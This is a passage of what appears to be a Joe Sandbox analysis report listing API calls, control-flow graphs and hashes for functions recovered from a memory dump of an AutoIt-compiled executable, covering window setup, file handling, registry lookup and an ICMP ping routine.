                                                                                                                                                                                                                                                                                                    • Instruction ID: b9c2c9ba41733ea563a1162114767634c870cab87e52ff606bd9b9ea6bb33841
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a4580cfe267e50719e0432dae66c59c0506cf66ff43943c001698b79fd135ae
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 11319F711083019FD311EF60DC85AAFBBF8EF99350F04492DF586871A1EB719989CBA2
                                                                                                                                                                                                                                                                                                    Function 00A2FFE0 Relevance: 3.1, APIs: 2, Instructions: 94nativeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleMemoryProtectVirtual
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2407445808-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7c9ff483ff0ca20d46c6562544df72464323d5068c9dc9ab5904de70767324f1
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3D31A071A00105DFD718DF58D4A0A69FBB6FB5A300F2486A5E44ACB656D732EDC1CBC0
                                                                                                                                                                                                                                                                                                    Function 00A1EE5B Relevance: 21.6, APIs: 14, Instructions: 609windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetInputState.USER32 ref: 00A1EF07
                                                                                                                                                                                                                                                                                                    • timeGetTime.WINMM ref: 00A1F107
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F228
                                                                                                                                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 00A1F27B
                                                                                                                                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00A1F289
                                                                                                                                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A1F29F
                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00A1F2B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 450d346359423645320378967bbf43810a8afbad3152911e473b65cb753cf663
                                                                                                                                                                                                                                                                                                    • Instruction ID: 787efad07810a24b714d2a4b94c579a6b99861de6678f383bbb4c57e8cb397c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 450d346359423645320378967bbf43810a8afbad3152911e473b65cb753cf663
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B232E031604382EFDB28CF24C884BEAB7F5BF85304F144629F9568B291D775E985CB92
                                                                                                                                                                                                                                                                                                    Function 00A13624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00A13657
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00A13681
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13692
                                                                                                                                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00A136AF
                                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A136BF
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00A136D5
                                                                                                                                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A136E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                                    • Opcode ID: 5adc9ba420bebb821564fef23d83950efc801ae222c60b553f9dfa2cd7b6fb2a
                                                                                                                                                                                                                                                                                                    • Instruction ID: d89024a8ce8b881467174b4437ed78e592bf92a2d88d6df50271a6b780173e5c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5adc9ba420bebb821564fef23d83950efc801ae222c60b553f9dfa2cd7b6fb2a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB21E0B1D01259AFDB04DFE4E889BDDBBB8FB09710F00511AF652AA6A0D7B545428F90
                                                                                                                                                                                                                                                                                                    Function 00A509DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 366 a509db-a50a0b call a507af 369 a50a26-a50a32 call a45594 366->369 370 a50a0d-a50a18 call a3f636 366->370 376 a50a34-a50a49 call a3f636 call a3f649 369->376 377 a50a4b-a50a94 call a5071a 369->377 375 a50a1a-a50a21 call a3f649 370->375 384 a50cfd-a50d03 375->384 376->375 386 a50a96-a50a9f 377->386 387 a50b01-a50b0a GetFileType 377->387 391 a50ad6-a50afc GetLastError call a3f613 386->391 392 a50aa1-a50aa5 386->392 388 a50b53-a50b56 387->388 389 a50b0c-a50b3d GetLastError call a3f613 CloseHandle 387->389 396 a50b5f-a50b65 388->396 397 a50b58-a50b5d 388->397 389->375 405 a50b43-a50b4e call a3f649 389->405 391->375 392->391 393 a50aa7-a50ad4 call a5071a 392->393 393->387 393->391 398 a50b67 396->398 399 a50b69-a50bb7 call a454dd 396->399 397->399 398->399 408 a50bc7-a50beb call a504cd 399->408 409 a50bb9-a50bc5 call a5092b 399->409 405->375 416 a50bed 408->416 417 a50bfe-a50c41 408->417 409->408 415 a50bef-a50bf9 call a48a2e 409->415 415->384 416->415 419 a50c43-a50c47 417->419 420 a50c62-a50c70 417->420 419->420 421 a50c49-a50c5d 419->421 422 a50c76-a50c7a 420->422 423 a50cfb 420->423 421->420 422->423 425 a50c7c-a50caf CloseHandle call a5071a 422->425 423->384 428 a50cb1-a50cdd GetLastError call a3f613 call a456a6 425->428 429 a50ce3-a50cf7 425->429 428->429 429->423
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A5071A: CreateFileW.KERNEL32(00000000,00000000,?,00A50A84,?,?,00000000,?,00A50A84,00000000,0000000C), ref: 00A50737
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50AEF
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50AF6
                                                                                                                                                                                                                                                                                                    • GetFileType.KERNEL32(00000000), ref: 00A50B02
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50B0C
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50B15
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00A50B35
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A50C7F
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00A50CB1
                                                                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00A50CB8
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                                    • Opcode ID: bc1b58877af328c7073f7e38f7a35460ad2e92e074cdc2d6c7d4141f6bd52794
                                                                                                                                                                                                                                                                                                    • Instruction ID: 14b513ec0a88a14ecfe664182aa40373be408ce6397d0ed0c7ccd3e427723d81
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc1b58877af328c7073f7e38f7a35460ad2e92e074cdc2d6c7d4141f6bd52794
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BA11232A142598FDF19EFB8D892BAE7BA0BB06325F14015AFC11DF2E1D7319806CB51
                                                                                                                                                                                                                                                                                                    Function 00A152A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00A54B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00A155B2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A15238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A1525A
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00A153C4
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00A54BFD
                                                                                                                                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00A54C3E
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00A54C80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A54CE7
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A54CF6
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                                    • Opcode ID: 724a4f7ddd59432277bb939d2f940d87fb91791785d4590a395007cb9b0d73da
                                                                                                                                                                                                                                                                                                    • Instruction ID: b117f1d0d63ec0267ccdb2e93bcd98d47f0ad6254a6b52513faf5c260362c327
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 724a4f7ddd59432277bb939d2f940d87fb91791785d4590a395007cb9b0d73da
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14717E725043419EC704DFA5D985DABBBF8FF99350F80442DF4418B1A0EB71DA8ACB62
                                                                                                                                                                                                                                                                                                    Function 00A134D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00A134DE
                                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00A134ED
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00A13503
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00A13515
                                                                                                                                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00A13527
                                                                                                                                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A1353F
                                                                                                                                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00A13590
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: GetSysColorBrush.USER32(0000000F), ref: 00A13657
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: RegisterClassExW.USER32(00000030), ref: 00A13681
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A13692
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: InitCommonControlsEx.COMCTL32(?), ref: 00A136AF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A136BF
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: LoadIconW.USER32(000000A9), ref: 00A136D5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A13624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A136E4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                                    • Opcode ID: 91097fdebc6f286f577b4e363aa47e9f0661666fd8d530faade115c23daa1961
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2cceffa6c2a4f881fb8d45f20a13e2e207087463ad28fd02f19bc1ad717f6d8e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 91097fdebc6f286f577b4e363aa47e9f0661666fd8d530faade115c23daa1961
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4212171D40399ABDB10DFD5EC99B99BFB8FB08750F00401AE605AF6A0D7B94546CF90
                                                                                                                                                                                                                                                                                                    Function 00A90FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 507 a90fb8-a90fef call a1e6a0 510 a9100f-a91021 WSAStartup 507->510 511 a90ff1-a90ffe call a1c98d 507->511 512 a91023-a91031 510->512 513 a91054-a91091 call a2c1f6 call a18ec0 call a2f9d4 inet_addr gethostbyname 510->513 511->510 519 a91000-a9100b call a1c98d 511->519 516 a91033 512->516 517 a91036-a91046 512->517 530 a91093-a910a0 IcmpCreateFile 513->530 531 a910a2-a910b0 513->531 516->517 520 a91048 517->520 521 a9104b-a9104f 517->521 519->510 520->521 524 a91249-a91251 521->524 530->531 532 a910d3-a91100 call a3017b call a1423c 530->532 533 a910b2 531->533 534 a910b5-a910c5 531->534 543 a9112b-a91148 IcmpSendEcho 532->543 544 a91102-a91129 IcmpSendEcho 532->544 533->534 535 a910ca-a910ce 534->535 536 a910c7 534->536 538 a91240-a91244 call a1bd98 535->538 536->535 538->524 545 a9114c-a9114e 543->545 544->545 546 a911ae-a911bc 545->546 547 a91150-a91155 545->547 550 a911be 546->550 551 a911c1-a911c8 546->551 548 a911f8-a9120a call a1e6a0 547->548 549 a9115b-a91160 547->549 565 a9120c-a9120e 548->565 566 a91210 548->566 552 a911ca-a911d8 549->552 553 a91162-a91167 549->553 550->551 555 a911e4-a911ed 551->555 560 a911da 552->560 561 a911dd 552->561 553->546 558 a91169-a9116e 553->558 556 a911ef 555->556 557 a911f2-a911f6 555->557 556->557 562 a91212-a91229 IcmpCloseHandle WSACleanup 557->562 563 a91170-a91175 558->563 564 a91193-a911a1 558->564 560->561 561->555 562->538 570 a9122b-a9123d call a3013d call a30184 562->570 563->552 567 a91177-a91185 563->567 568 a911a3 564->568 569 a911a6-a911ac 564->569 565->562 566->562 571 a9118a-a91191 567->571 572 a91187 567->572 568->569 569->555 570->538 571->555 572->571
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000101,?), ref: 00A91019
                                                                                                                                                                                                                                                                                                    • inet_addr.WSOCK32(?), ref: 00A91079
                                                                                                                                                                                                                                                                                                    • gethostbyname.WS2_32(?), ref: 00A91085
                                                                                                                                                                                                                                                                                                    • IcmpCreateFile.IPHLPAPI ref: 00A91093
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A91123
                                                                                                                                                                                                                                                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A91142
                                                                                                                                                                                                                                                                                                    • IcmpCloseHandle.IPHLPAPI(?), ref: 00A91216
                                                                                                                                                                                                                                                                                                    • WSACleanup.WSOCK32 ref: 00A9121C
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                                                                                                                                                    • String ID: Ping
                                                                                                                                                                                                                                                                                                    • API String ID: 1028309954-2246546115
                                                                                                                                                                                                                                                                                                    • Opcode ID: f76a73d2737109846c71e8bd5301fa3adb6350be7c9843a051d7c7c8498ff4da
                                                                                                                                                                                                                                                                                                    • Instruction ID: 99eca99ffbc30c094e008b664dbb640c74952b72a2d36fb78373971d6c09b2f7
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f76a73d2737109846c71e8bd5301fa3adb6350be7c9843a051d7c7c8498ff4da
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD919231604242AFDB20DF55C984F56BBE0FF49318F1486ADF5698B6A2C731ED86CB81
                                                                                                                                                                                                                                                                                                    Function 00A1370F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                    control_flow_graph 577 a1370f-a13724 578 a13784-a13786 577->578 579 a13726-a13729 577->579 578->579 580 a13788 578->580 581 a1372b-a13732 579->581 582 a1378a 579->582 583 a1376f-a13777 DefWindowProcW 580->583 586 a13804-a1380c PostQuitMessage 581->586 587 a13738-a1373d 581->587 584 a53df4-a53e1c call a12f92 call a2f23c 582->584 585 a13790-a13795 582->585 591 a1377d-a13783 583->591 620 a53e21-a53e28 584->620 593 a13797-a1379a 585->593 594 a137bc-a137e3 SetTimer RegisterWindowMessageW 585->594 592 a137b8-a137ba 586->592 588 a13743-a13747 587->588 589 a53e61-a53e75 call a7c8f7 587->589 595 a1374d-a13752 588->595 596 a1380e-a13818 call a2fcad 588->596 589->592 612 a53e7b 589->612 592->591 600 a53d95-a53d98 593->600 601 a137a0-a137b3 KillTimer call a13907 call a159ff 593->601 594->592 597 a137e5-a137f0 CreatePopupMenu 594->597 602 a53e46-a53e4d 595->602 603 a13758-a1375d 595->603 614 a1381d 596->614 597->592 607 a53dd0-a53def MoveWindow 600->607 608 a53d9a-a53d9e 600->608 601->592 602->583 618 a53e53-a53e5c call a71423 602->618 610 a13763-a13769 603->610 611 a137f2-a13802 call a1381f 603->611 607->592 615 a53da0-a53da3 608->615 616 a53dbf-a53dcb SetFocus 608->616 610->583 610->620 611->592 612->583 614->592 615->610 621 a53da9-a53dba call a12f92 615->621 616->592 618->583 620->583 626 a53e2e-a53e41 call a13907 call a1396b 620->626 621->592 626->583
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00A13709,?,?), ref: 00A13777
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,00A13709,?,?), ref: 00A137A3
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A137C6
                                                                                                                                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00A13709,?,?), ref: 00A137D1
                                                                                                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 00A137E5
                                                                                                                                                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 00A13806
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
